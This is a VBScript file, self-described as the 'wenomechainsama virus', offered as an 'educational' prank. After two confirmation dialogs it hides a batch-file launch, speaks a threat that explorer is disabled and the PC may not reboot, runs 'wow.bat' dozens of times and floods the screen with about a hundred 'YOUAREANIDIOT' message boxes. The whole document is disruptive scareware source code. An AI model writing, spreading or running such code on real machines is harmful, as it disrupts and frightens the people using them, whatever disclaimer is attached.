X=MsgBox("WARNING the file u have just executed considers as a virus, this file is was made for educational purposes only, the file u have just executed may damage your device in some windows versions, or if u run him as administrator, if u know what ur doing press yes below by clicking yes u accept all the next terms of service you agree that you are the only one that responsible for the damage done is only you, if u don't know what u have just executed simply close this window and nothing will happend. THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE",4 +48,"wenomechainsama virus")
if x=6 then
X=MsgBox("LAST WARNING this virus is not a joke, Are u sure u want to execute this file, as always THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE",4 +48,"wenomechainsama virus")
elseif x=7 then
end if
if x=6 then
  Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "cmd /c lolwenomechainsama.bat"
oShell.Run strArgs, 0, false
Dim message, sapi 
message="You did a big mistake, your explorer was disabled by wenomechainsama creepypasta virus, There is an only a fun escape from now, woulden't recommend shutting down the pc / restarting it, because it may never boot up again... should we begin the fun?"
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WshShell.run "wow.bat"
WScript.Sleep 600
WshShell.SendKeys "{F11}"
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
X=MsgBox("YOUAREANIDIOT",0 +48,"wenomechainsama")
elseif x=7 then
end if